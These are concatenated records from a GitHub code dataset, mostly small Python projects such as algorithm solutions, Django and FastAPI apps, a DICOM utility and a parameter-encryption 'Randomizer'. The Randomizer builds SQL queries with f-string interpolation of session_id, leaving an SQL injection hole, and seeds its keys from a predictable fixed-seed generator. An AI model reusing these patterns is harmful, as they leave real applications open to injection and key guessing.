0)\n","repo_name":"HamzaAmir123/CapstoneProject","sub_path":"src/app/lights.py","file_name":"lights.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2190006140","text":"#!/usr/bin/env python3\n'''module that deals with functions'''\n\ndef commandpush(devicecmd): #devicecmd=list\n    ''' push commands to devices '''\n    for coffeetime in devicecmd.keys():\n        print(\"Handshaking......connecting with \" + coffeetime)\n        for mycmds in devicecmd[coffeetime]:\n            print(\"Attempting to send command --> \" + mycmds)\n        print(\"\\n\")\n\ndef betterpush(filename): #file name having ip and commands\n    '''better push commands to devices'''\n    fstream = open(filename, \"r\")\n    #lines = fstream.readlines()\n    for l_a in fstream:\n        #print(l)\n        s_a = str(l_a).strip()\n        #print(s)\n        print(s_a.isnumeric())\n        #if s.isalpha()== True:\n        #    print(\"Attempting to send command --> \" + s, end=\"\")\n        #else:\n        #    print(\"Handshaking....connecting with \" + s, end=\"\")\n\ndef deviceboot(iplist): #list of IPs\n    '''boot list of IPs '''\n    for ip_a in iplist:\n        print(\"Connecting to... \" + ip_a)\n        print(\"Rebooting NOW!...\")\n\n\n\ndef main():\n    ''' main function '''\n    work2do = {\"10.1.0.1\":[\"interface eth1/2\", \"no shut\"],\n               \"10.2.0.1\":[\"interface eth1/1\", \"shutdown\"]}\n    iplist = [\"10.1.0.1\", \"10.2.0.1\"]\n    work2do_file = \"work2do.txt\"\n\n    print(\"Welcome to the network device command pusher\") # welcome message\n    #get data set\n    print(\"\\nData set found\\n\") # replace with function call that reads in data from file\n    betterpush(work2do_file)\n    print(\"\\n\")\n    ##run commandpush\n    commandpush(work2do) # call function to push commands to devices\n\n    #run deviceboot\n    deviceboot(iplist)\n\n#call main function\nmain()\n","repo_name":"mg9313/PythonBasiscs7-22-19","sub_path":"netfunct01/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15730546335","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('horario', '0005_auto_20151221_2229'),\n    ]\n\n    operations = [\n        migrations.RemoveField(\n            model_name='semana',\n            name='id_año',\n        ),\n        migrations.AddField(\n            model_name='semana',\n            name='id_carrera_año',\n            field=models.ForeignKey(to='horario.CarreraAño', default=0),\n            preserve_default=False,\n        ),\n    ]\n","repo_name":"ucorreag/horario","sub_path":"horario_docente/apps/horario/migrations/0006_auto_20151224_1629.py","file_name":"0006_auto_20151224_1629.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15216863759","text":"from math import log, ceil\r\n\r\n\r\n\r\ndef solve_problem(L, P, C):\r\n    intervals = int(ceil(log((P+L-1) // L, C)))\r\n    tests = 0\r\n    while intervals > 1:\r\n        tests += 1\r\n        intervals = (intervals + 1) // 2\r\n\r\n    return tests\r\n    \r\ndef run_process(args):\r\n    return solve_problem(*args)\r\n\r\ndef process_file(fin, fout):\r\n    def get_problem():\r\n        return map(int, fin.readline().split(' '))\r\n    \r\n    numLines = int(fin.readline())\r\n    problem_list = [get_problem() for i in range(numLines)]\r\n    \r\n    if False:\r\n        from multiprocessing import Pool\r\n        p = Pool(8)\r\n        solution_list = p.map(run_process, problem_list)\r\n    else:\r\n        
solution_list = map(run_process, problem_list)\r\n    for i, s in enumerate(solution_list):\r\n        fout.write(\"Case #%s: %s\\n\" % (i + 1, s))\r\n    \r\nif __name__ == '__main__':\r\n    from sys import argv\r\n    process_file(open(argv[1]), open(argv[1].replace(\"in\", \"out\"), \"w\"))\r\n","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/CodeJamData/10/32/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"31411341633","text":"from typing import *\n\nclass ListNode:\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\n\"\"\"\n    142 - Linked List Cycle II\n    Time: O(n)\n    Space: O(1)\n    Note: Uses Floyd's Algorithm\n\"\"\"\ndef detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n    cycleFound = False\n    slow, fast = head, head\n    while fast and fast.next:\n        slow = slow.next\n        fast = fast.next.next\n        if slow == fast:\n            cycleFound = True\n            break\n    if not cycleFound:\n        return None\n    slow2 = head\n    while slow != slow2:\n        slow = slow.next\n        slow2 = slow2.next\n    \n    return slow","repo_name":"MelvinSam2000/leetcode-rs","sub_path":"python/q142.py","file_name":"q142.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37572520504","text":"a=input(\"Left or Right?\").lower()\nif(a==\"left\"):\n    print(\"Game Over\")\nelif(a==\"right\"):\n    b=input(\"Swim or Wait?\").lower()\n    if(b==\"wait\"):\n        print(\"End Game\")\n    elif(b==\"swim\"):\n        c=input(\"What color do you choose?\").lower()\n        if(c==\"yellow\"):\n            print(\"You win\")\n        else:\n            print(\"Game over\")\n","repo_name":"Rajeevv8/pythonprograms","sub_path":"Basic ProblemSolving/treasurehunt.py","file_name":"treasurehunt.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72432084393","text":"import time\nimport logging\n\nimport requests\n\nlogger = logging.getLogger()\n\n\ndef fetch_stars(repo: str) -> int:\n    url = f\"https://api.github.com/repos/{repo}\"\n    logger.info(\"Fetching result from %s\", url)\n    return requests.get(url).json()['stargazers_count']\n\n\ndef print_stars(repo: str):\n    start_time = time.time()\n    stars = fetch_stars(repo)\n    duration = time.time() - start_time\n\n    logger.info(\"Stars for %s: %s (took %.3fs)\", repo, stars, duration)\n\n\ndef main() -> None:\n    log_format = \"%(asctime)s %(levelname)s [%(name)s] %(message)s\"\n    logging.basicConfig(level=logging.INFO, format=log_format)\n\n    print_stars(\"antirez/redis\")\n    print_stars(\"aerospike/aerospike-server\")\n\n    print_stars(\"antirez/redis\")\n    print_stars(\"hazelcast/hazelcast\")\n\n    print_stars(\"antirez/redis\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"gavrie/pycourse2019-09","sub_path":"ex_05_2_memoize/memoize1_fetch.py","file_name":"memoize1_fetch.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38763195120","text":"from app.modules.user import User,db as udb\nfrom sqlalchemy import or_\nfrom app.data_handle.user_intro import user_intro\n\ndef query_user(phone='',token=''):\n    user = User.query.filter(\n        or_(\n            User.username == phone,\n            User.token == token\n        )\n    ).first()\n    udb.session.close()\n    return 
user_intro(user)","repo_name":"potatopeople/movie","sub_path":"movie-h/app/mysqls/query_user.py","file_name":"query_user.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25305278451","text":"'''\r\nUpdated: 10/11/2021\r\nAuthor: Alex Waters\r\n\r\nThis is a piece of utility code that unzips a Bruker Paravision 6 dicom archive,\r\nappends scan numbers to the dicom file names, and saves a montage of the dicom images\r\nfor quick reference.\r\n\r\nInput: Use file selection interface to choose a .tar.gz file containing Bruker \r\n       DICOM folders as exported from the scanner (PV6)\r\n\r\nOutput: \r\n    - Creates a directory 'tmpDICOM' into which the archive is unpacked\r\n    - Inside the dicom folder for each scan, the scan number is appended to the dicom filenames\r\n      (example: MRIm01.dcm becomes MRIm01__E5.dcm). This is useful when interleaving scans from \r\n      different acquisitions.\r\n    - Creates a montage for each scan and saves it as a .png file. The montage is also displayed\r\n      as a plot, which is useful when running this code inside Spyder or a similar tool with an \r\n      inline plot editor. Otherwise you may wish to comment it out.\r\n    \r\nLimitations: The tmpDICOM directory can already exist, but should be empty at\r\n             the time of running the script. Unpacked files and newly created\r\n             montages should be transferred to a different directory after \r\n             the script is run.\r\n\r\n'''\r\n\r\n\r\nimport os, re, tarfile\r\nimport numpy as np\r\nimport imageio\r\nfrom skimage.util import montage\r\nfrom matplotlib import pyplot as plt\r\nfrom tkinter.filedialog import askopenfilename\r\n\r\n\r\n\r\n# Rewrite the splitext function to handle .tar.gz\r\ndef splitext(path):\r\n    for ext in ['.tar.gz', '.tar.bz2']:\r\n        if path.endswith(ext):\r\n            return path[:-len(ext)], path[-len(ext):]\r\n    return os.path.splitext(path)\r\n\r\n\r\n# Get the filename and directory of the dicom archive\r\ndcmArchive = askopenfilename(initialdir=\"E:/MRI_Data/2018/Sandbox\",\r\n                             filetypes =((\"tarball\", \"*.tar.gz\"),(\"All Files\",\"*.*\")),\r\n                             title = \"Choose a DICOM archive.\"\r\n                             )\r\n\r\n# Untar the dicom archive if it exists\r\ntry:\r\n    print (dcmArchive)\r\n    if tarfile.is_tarfile(dcmArchive):\r\n        print(\"it is a tar file.\")\r\n        tfile=tarfile.open(dcmArchive,'r:gz')\r\n        tfile.extractall(os.path.dirname(dcmArchive))\r\n        tfile.close()\r\nexcept Exception:\r\n    print(\"There was an error extracting the DICOM archive. 
The file might be corrupt or missing.\")\r\n\r\n\r\norgDir=os.path.join(os.path.dirname(dcmArchive),'tmpDICOM')\r\n\r\n\r\nscanNumRegex=re.compile(r'__E\\d+')\r\n\r\nallDcmFolders=os.listdir(orgDir)\r\n\r\nfor dcmFolder in allDcmFolders:\r\n scanNumSrch=scanNumRegex.search(dcmFolder)\r\n if scanNumSrch == None:\r\n scanNum=''\r\n else:\r\n scanNum=scanNumSrch.group(0)\r\n\r\n allDcmFiles=os.listdir(os.path.join(orgDir,dcmFolder))\r\n image_list=[]\r\n for dcmFile in allDcmFiles:\r\n if scanNumRegex.search(dcmFile) == None:\r\n base_name, fileext=splitext(dcmFile)\r\n oldPath = os.path.join(orgDir,dcmFolder,base_name+fileext)\r\n newPath = os.path.join(orgDir,dcmFolder,base_name+scanNum+fileext)\r\n os.rename(oldPath,newPath)\r\n # ds = pydicom.dcmread(newPath)\r\n # cur_image = ds.pixel_array\r\n # image_list.append(cur_image)\r\n # num_images = len(image_list)\r\n # image_size = np.shape(image_list[0])\r\n # image_array = np.array(image_list)\r\n \r\n vol = imageio.volread(os.path.join(orgDir,dcmFolder), 'DICOM')\r\n \r\n #this_montage = montage(image_array)\r\n \r\n if np.ndim(vol) == 2:\r\n this_montage = vol\r\n else:\r\n this_montage = montage(vol)\r\n this_montage = (this_montage/np.amax(this_montage))*255\r\n \r\n # Remove these lines if you are not using a tool that supports inline plotting\r\n plt.imshow(this_montage.squeeze(), interpolation='nearest')\r\n plt.show()\r\n \r\n \r\n montage_name = dcmFolder+'_montage.png'\r\n imageio.imwrite(os.path.join(orgDir,montage_name),this_montage.astype('uint8'))\r\n\r\n","repo_name":"EAlexWaters/numberDicomMontage","sub_path":"NumberDicomMontage.py","file_name":"NumberDicomMontage.py","file_ext":"py","file_size_in_byte":3916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31441472508","text":"import turtle\r\n\r\nsc = turtle.Screen() # let sc for screen\r\nsc.bgcolor(\"light green\") \r\nsc.title(\"5. use of pencolor and pensize\") \r\n\r\nsh = turtle.Turtle()\r\nsh.pencolor(\"red\")\r\nsh.pensize(3)\r\nsh.showturtle()\r\n\r\nfor i in range(6):\r\n sh.left(90)\r\n sh.forward(40)\r\n sh.right(90)\r\n sh.forward(40)\r\nfor j in range(2):\r\n sh.right(90)\r\n sh.forward(240)\r\n \r\nturtle.done()\r\n","repo_name":"sukhvir786/Python-Day-7-Graphics","sub_path":"graph5.py","file_name":"graph5.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3327946081","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\n\r\ndef merge_sort(arr):\r\n if len(arr) < 2:\r\n return arr\r\n\r\n mid = (len(arr)+1) // 2\r\n low_arr = merge_sort(arr[:mid])\r\n high_arr = merge_sort(arr[mid:])\r\n\r\n merged_arr = []\r\n l = h = 0\r\n while l < len(low_arr) and h < len(high_arr):\r\n if low_arr[l] < high_arr[h]:\r\n merged_arr.append(low_arr[l])\r\n answer.append(low_arr[l])\r\n l += 1\r\n else:\r\n merged_arr.append(high_arr[h])\r\n answer.append(high_arr[h])\r\n h += 1\r\n\r\n for i in range(l, len(low_arr)):\r\n answer.append(low_arr[i])\r\n merged_arr.append(low_arr[i])\r\n\r\n for j in range(h, len(high_arr)):\r\n answer.append(high_arr[j])\r\n merged_arr.append(high_arr[j])\r\n\r\n return merged_arr\r\n\r\n\r\nanswer = []\r\nN, M = map(int, input().split())\r\nlistA = list(map(int, input().split()))\r\n\r\n\r\nmerge_sort(listA)\r\n\r\n\r\nif len(answer) >= M:\r\n print(answer[M-1])\r\nelse:\r\n print(-1)","repo_name":"sknyuki/Algorithm","sub_path":"백준/Silver/24060. 
알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43400693159","text":"SHIP_INFO = {\n    \"CV\": 4, # 5 cells\n    \"OR\": 2, # 4 cells\n    \"CA\": 3,\n    \"BB\": 4,\n    \"DD\": 2\n}\n\nROW_OF_SHIP = {\n    \"CV\": 2, # 5 cells\n    \"OR\": 2, # 4 cells\n    \"CA\": 1,\n    \"BB\": 1,\n    \"DD\": 1\n}\n\nclass ShipPattern:\n    def getShipPattern(self, type, row, col, isVertical):\n        ret = []\n\n        if type == \"CV\":\n            if isVertical:\n                for i in range(4):\n                    ret.append([ row + i, col ])\n                ret.append([ row + 1, col - 1 ])\n            else:\n                for i in range(4):\n                    ret.append([ row, col + i ])\n                ret.append([ row - 1, col + 1 ])\n            return ret\n        if type == \"OR\":\n            for i in range(2):\n                for j in range(2):\n                    ret.append([ row + i, col + j ])\n            return ret\n        if type == \"CA\":\n            length = 3\n        elif type == \"BB\":\n            length = 4\n        else:\n            # DD\n            length = 2\n\n        if isVertical:\n            for i in range(length):\n                ret.append([ row + i, col ])\n        else:\n            for i in range(length):\n                ret.append([ row, col + i ])\n        return ret\n\nclass Ship:\n    def __init__(self, type, row, col, isVertical):\n        self.type = type\n        self.length = SHIP_INFO[self.type]\n        self.rows = ROW_OF_SHIP[self.type]\n        pattern = ShipPattern()\n        self.coordinates = pattern.getShipPattern(type, row, col, isVertical)\n\n","repo_name":"khacduy221997/battle-ships","sub_path":"api/ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15226491452","text":"from fastapi import Depends, APIRouter\nfrom pydantic import BaseModel\nfrom .base import get_db\nfrom .auth import auth_class\nfrom sqlalchemy.orm import session\nimport models\nfrom fastapi.responses import JSONResponse\n\n\ntheatre_audi_router_and_seat_detail = APIRouter()\nauth = auth_class()\n\n\ndef seat_detail(detail, db):\n    theatre_id = detail[\"theatre_id\"]\n    audi_id = detail[\"audi_id\"]\n    audi_name = detail[\"audi_name\"]\n    audi_total_seat = detail[\"audi_total_seat\"]\n    row = detail[\"row\"]\n    column = detail[\"column\"]\n    audi_seat_type = detail[\"audi_seat_type\"]\n\n    total_seat_number = row * column\n\n    seat_detail_data_json = []\n\n    for i in range(row):\n        row_character = chr(ord(\"A\") + i)\n        for j in range(column):\n            seat_detail_model = models.seat_detail_model()\n\n            column_number = j + 1\n            seat_id = f\"{row_character}{column_number}\"\n            print(seat_id)\n\n            seat_name = f\"{theatre_id}-{audi_id}-{audi_name}-{seat_id}\"\n            seat_name_without_space = seat_name.replace(\" \", \"\")\n\n            seat_detail_model.seat_name = seat_name_without_space\n            seat_detail_model.theatre_id = theatre_id\n            seat_detail_model.seat_id = seat_id\n            seat_detail_model.audi_id = audi_id\n            seat_detail_model.row = row\n            seat_detail_model.column = column\n            seat_detail_model.is_active = True\n            seat_detail_model.seat_type = audi_seat_type\n            seat_detail_model.total_seat = total_seat_number\n            seat_detail_model.seat_status = int(1)\n\n            db.add(seat_detail_model)\n            db.commit()\n\n            single_seat_data = {\n                \"seat_name\": seat_detail_model.seat_name,\n                \"theatre_id\": seat_detail_model.theatre_id,\n                \"seat_id\": seat_detail_model.seat_id,\n                \"audi_id\": seat_detail_model.audi_id,\n                \"row\": seat_detail_model.row,\n                \"column\": seat_detail_model.column,\n                \"is_active\": seat_detail_model.is_active,\n                \"seat_type\": seat_detail_model.seat_type,\n                \"total_seat\": seat_detail_model.total_seat,\n                
\"seat_status\": seat_detail_model.seat_status,\n }\n\n seat_detail_data_json.append(single_seat_data)\n\n return seat_detail_data_json\n\n\nclass threatre_audi_schema(BaseModel):\n audi_name: str\n audi_total_seat: int\n row: int\n column: int\n audi_seat_type: str\n\n\n@theatre_audi_router_and_seat_detail.post(\"/theatre_audi\")\ndef theatre_audi(\n details: threatre_audi_schema,\n db: session = Depends(get_db),\n authenticate=Depends(auth.mid),\n):\n theatre_audi_model = models.theatre_audi_model()\n\n theatre_audi_model.theatre_id = authenticate[\"theatre_id\"]\n theatre_audi_model.audi_name = details.audi_name\n theatre_audi_model.audi_total_seat = details.audi_total_seat\n theatre_audi_model.row = details.row\n theatre_audi_model.column = details.column\n theatre_audi_model.audi_seat_type = details.audi_seat_type\n\n db.add(theatre_audi_model)\n db.commit()\n\n db.refresh(theatre_audi_model)\n\n theatre_audi_data_json = {\n \"theatre_id\": authenticate[\"theatre_id\"],\n \"audi_id\": theatre_audi_model.audi_id,\n \"audi_name\": details.audi_name,\n \"audi_total_seat\": details.audi_total_seat,\n \"row\": details.row,\n \"column\": details.column,\n \"audi_seat_type\": theatre_audi_model.audi_seat_type,\n }\n\n seat_detail_data = seat_detail(theatre_audi_data_json, db)\n\n theatre_id = authenticate[\"theatre_id\"]\n return JSONResponse(\n content={\n \"status\": 999,\n \"audi_data\": theatre_audi_data_json,\n \"seat_detail\": seat_detail_data,\n },\n status_code=200,\n )\n","repo_name":"mrshrestha0000/movie_cineplex","sub_path":"router_admin/theatre_audi.py","file_name":"theatre_audi.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2343632127","text":"import os\nimport re\nfrom typing import Optional\n\nimport schedule\nimport hashlib\nimport base64\nimport sqlite3\n\nfrom Crypto import Random\nfrom Crypto.Cipher import AES\n\nfrom nomad.data.create_db import *\n# from nomad.data.create_db import DB_NAME, create_db, TABLE_NAME\n\nSEED = 69\n\n\ndef xor_shift():\n global SEED\n for i in range(10):\n SEED = (SEED * 1664525 + 1013904223) & 0xFFFFFFFF\n return SEED\n\n# for sqlite purposes\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n\nclass AESCipher:\n def __init__(self, byte_key):\n self.block_size = AES.block_size\n self.key = byte_key\n\n def encrypt(self, plain_text):\n plain_text = self._pad(plain_text)\n iv = Random.new().read(AES.block_size)\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return base64.b64encode(iv + cipher.encrypt(plain_text.encode()))\n\n def decrypt(self, encrypted_text):\n # some magic from SO\n altchars = b'+/'\n encrypted_text = re.sub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', encrypted_text)\n missing_padding = len(encrypted_text) % 4\n if missing_padding:\n encrypted_text += b'=' * (4 - missing_padding)\n\n encrypted_text = base64.b64decode(encrypted_text, altchars)\n iv = encrypted_text[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(encrypted_text[AES.block_size:])).decode('utf-8')\n\n def _pad(self, s):\n return s + (self.block_size - len(s) % self.block_size) * \\\n chr(self.block_size - len(s) % self.block_size)\n\n @staticmethod\n def _unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n\nclass Randomizer:\n def __init__(self, time_slot_len: int = 30, hashing_func: str = 'sha256'):\n self._hashing_func = hashing_func\n\n 
self._current_master_key = self._gen_master_key()\n        schedule.every(time_slot_len).minutes.do(self._gen_master_key)\n\n        create_db(dir_path='nomad/data')\n        # self._session_master_dict = {}  # {session_id : master_key}\n        # schedule.every(time_slot_len).minutes.do(self._update_session_key_dict)\n\n    @staticmethod\n    def _gen_master_key():\n        return xor_shift()\n\n    @staticmethod\n    def _get_db_controller() -> sqlite3.Connection:\n        # if not os.path.isfile(f'nomad/data/{DB_NAME}'):\n        #     create_db()\n        conn = sqlite3.connect(f'nomad/data/{DB_NAME}')\n        conn.row_factory = dict_factory\n        return conn\n\n    def _get_master_key(self, session_id: str) -> Optional[str]:\n        db = self._get_db_controller()\n        c = db.cursor()\n        resp = list(c.execute(f\"SELECT * FROM {TABLE_NAME} WHERE session_id = '{session_id}'\"))\n        if resp:\n            return resp[0]['master_key']\n\n    def _add_new_connection(self, session_id: str):\n        db = self._get_db_controller()\n        c = db.cursor()\n        c.execute(f\"INSERT INTO {TABLE_NAME} VALUES ('{session_id}', '{self._current_master_key}')\")\n        db.commit()\n\n    def _get_all_session_ids(self):\n        db = self._get_db_controller()\n        c = db.cursor()\n        return [s_key['session_id']\n                for s_key in list(c.execute(f\"SELECT session_id FROM {TABLE_NAME}\"))]\n\n    def _update_session_key_dict(self):  # TODO\n        \"\"\"\n        checks if there are session ids in keys that are no longer valid\n        \"\"\"\n        pass\n\n    def _get_session_key(self, session_id: str, client_id: str) -> bytes:\n        hash_container = hashlib.new(name=self._hashing_func)\n        if session_id not in self._get_all_session_ids():\n            self._add_new_connection(session_id)\n        master_key = self._get_master_key(session_id)\n\n        hash_container.update(str(master_key).encode('UTF-8'))\n        hash_container.update(str(client_id).encode('UTF-8'))\n        return hash_container.digest()\n\n    def randomize_parameter(self, param_value, session_id, client_id):\n        session_key = self._get_session_key(session_id, client_id)\n        aes = AESCipher(byte_key=session_key)\n        return aes.encrypt(param_value).decode('UTF-8')\n\n    def derandomize_parameter(self, randomized_value, session_id, client_id):\n        randomized_value = randomized_value.encode('UTF-8')\n        session_key = self._get_session_key(session_id, client_id)\n        aes = AESCipher(byte_key=session_key)\n        return aes.decrypt(randomized_value)\n\n\nif __name__ == '__main__':\n    session = 'abc'\n    client = 'AlbertEinstein'\n    parameter = 'someParam123'\n    print(f'ORIGINAL KEY: {parameter}')\n    r = Randomizer(time_slot_len=1)\n    randomized = r.randomize_parameter(param_value=parameter, session_id=session, client_id=client)\n    print(f'RANDOMIZED: {randomized}')\n    derandomized = r.derandomize_parameter(randomized_value=randomized, session_id=session, client_id=client)\n    print(f'DERANDOMIZED: {derandomized}')\n\n","repo_name":"Shrimpey/SPZC","sub_path":"nomad/randomizer.py","file_name":"randomizer.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74828102311","text":"from itertools import product\nfrom django.shortcuts import get_object_or_404\nfrom .models import Product, City, Warehouse, Stock\nfrom .serializers import ProductSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.renderers import JSONRenderer\nimport json\nfrom rest_framework import status\n\n# Check if the inventory item exists. 
If not, create it.\nclass CreateProductView(APIView):\n def post(self, request, format=None):\n title = request.data['name']\n desc = request.data['description']\n retail_price = request.data['price']\n code = request.data['upc']\n if not (Product.objects.filter(product_code = code).exists()):\n Product.objects.create(product_name = title, product_description = desc, product_msrp = retail_price, product_code = code)\n content = {\"detail\":\"Created new item.\"}\n return Response(content,status=status.HTTP_201_CREATED)\n else:\n content = {\"detail\":\"Item already exists.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n\n# If the inventory item exists, then update the items price. Otherwise throw an error.\n# I made the assumption that price can be changed more often than the other fields (name, code, description).\nclass EditProductView(APIView):\n def post(self, request, format=None):\n new_price = request.data['price']\n code = request.data['upc']\n if Product.objects.filter(product_code = code).exists():\n obj = Product.objects.filter(product_code = code)\n obj.update(product_msrp = new_price)\n content = {\"detail\":\"Updated item.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Not found.\"}\n return Response(content,status=status.HTTP_404_NOT_FOUND)\n \n\n# If the inventory item exists, then delete inventory items. Otherwise throw an error.\nclass DeleteProductView(APIView):\n def post(self, request, format=None):\n code = request.data['upc']\n if Product.objects.filter(product_code = code).exists():\n obj = Product.objects.filter(product_code = code)\n obj.delete()\n content = {\"detail\":\"Deleted item.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Not found.\"}\n return Response(content,status=status.HTTP_404_NOT_FOUND)\n\n# Return a list of all inventory items.\nclass GetAllProductsView(APIView):\n def get(self, request, format=None):\n objs = Product.objects.all()\n serializer = ProductSerializer(objs, many=True)\n d = JSONRenderer().render(serializer.data)\n items = json.loads(d)\n return Response({\"item_list\":items})\n\n# I made the assumption that a user might also want to search for a specific item.\n# Return a searched inventory item.\nclass GetProductView(APIView):\n def get(self, request, format=None):\n code = request.query_params.get('upc')\n item = get_object_or_404(Product, product_code = code)\n return Response({\n \"name\": item.product_name,\n \"description\": item.product_description,\n \"msrp\": item.product_msrp,\n \"upc\": item.product_code\n })\n\n# Check if the warehouse exists. 
If not, create a new warehouse.\nclass CreateWarehouseView(APIView):\n def post(self, request, format=None):\n building = request.data['building_name']\n street = request.data['street_add']\n city_loc = request.data['city']\n state_loc = request.data['state']\n zip = request.data['zipcode']\n\n if not (City.objects.filter(city_name = city_loc, state = state_loc, zipcode = zip).exists()):\n City.objects.create(city_name = city_loc, state = state_loc, zipcode = zip)\n\n city_obj = get_object_or_404(City, city_name = city_loc, state = state_loc, zipcode = zip)\n\n if not (Warehouse.objects.filter(warehouse_name = building, address = street).exists()):\n Warehouse.objects.create(warehouse_name = building, address = street, city_id = city_obj)\n content = {\"detail\":\"Created new warehouse.\"}\n return Response(content,status=status.HTTP_201_CREATED)\n else:\n content = {\"detail\":\"Warehouse already exists.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n\n# I made the assumption that the user knows what the item and warehouse is. If either of them do not exist in the database, throw an error.\n# Check if the inventory item exists in the warehouse. If not, assign the item to the warehouse.\nclass AssignProductWarehouseView(APIView):\n def post(self, request, format=None):\n code = request.data['upc']\n building = request.data['building_name']\n street = request.data['street_add']\n city_loc = request.data['city']\n state_loc = request.data['state']\n zip = request.data['zipcode']\n stock_amount = request.data['quant']\n item_obj = get_object_or_404(Product, product_code = code)\n city_obj = get_object_or_404(City, city_name = city_loc, state = state_loc, zipcode = zip)\n warehouse_obj = get_object_or_404(Warehouse, warehouse_name = building, address = street, city_id = city_obj)\n\n if not (Stock.objects.filter(product_id = item_obj, warehouse_id = warehouse_obj).exists()):\n Stock.objects.create(product_id = item_obj, warehouse_id = warehouse_obj, quantity = stock_amount)\n content = {\"detail\":\"Assigned items to warehouse.\"}\n return Response(content,status=status.HTTP_200_OK)\n else:\n content = {\"detail\":\"Item is already in warehouse.\"}\n return Response(content,status=status.HTTP_400_BAD_REQUEST)\n \n ","repo_name":"anthonyhom/Inventory-Backend-Challenge","sub_path":"shopify_challenge/inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72176963113","text":"import heapq\r\n\r\ndef solve(start_node):\r\n dist = [pow(10, 15)]*(n+1)\r\n dist[start_node] = 0\r\n pq = []\r\n heapq.heappush(pq, [0, start_node])\r\n while pq:\r\n current_dist, current_node = heapq.heappop(pq)\r\n for next_node, weight in li[current_node].items():\r\n next_dist = dist[current_node] + weight\r\n if next_dist < dist[next_node]:\r\n dist[next_node] = next_dist\r\n heapq.heappush(pq, [next_dist, next_node])\r\n return dist\r\n\r\nfor t in range(int(input())):\r\n n, m, s, e = map(int, input().split())\r\n li = [dict() for _ in range(n+1)]\r\n for _ in range(m):\r\n a, b, w = map(int, input().split())\r\n li[a][b], li[b][a] = w, w\r\n answer = solve(s)\r\n print('#' + str(t+1), str(answer[e]))","repo_name":"khw5123/Algorithm","sub_path":"SWExpert/1803. Shortest Path Faster.py","file_name":"1803. 
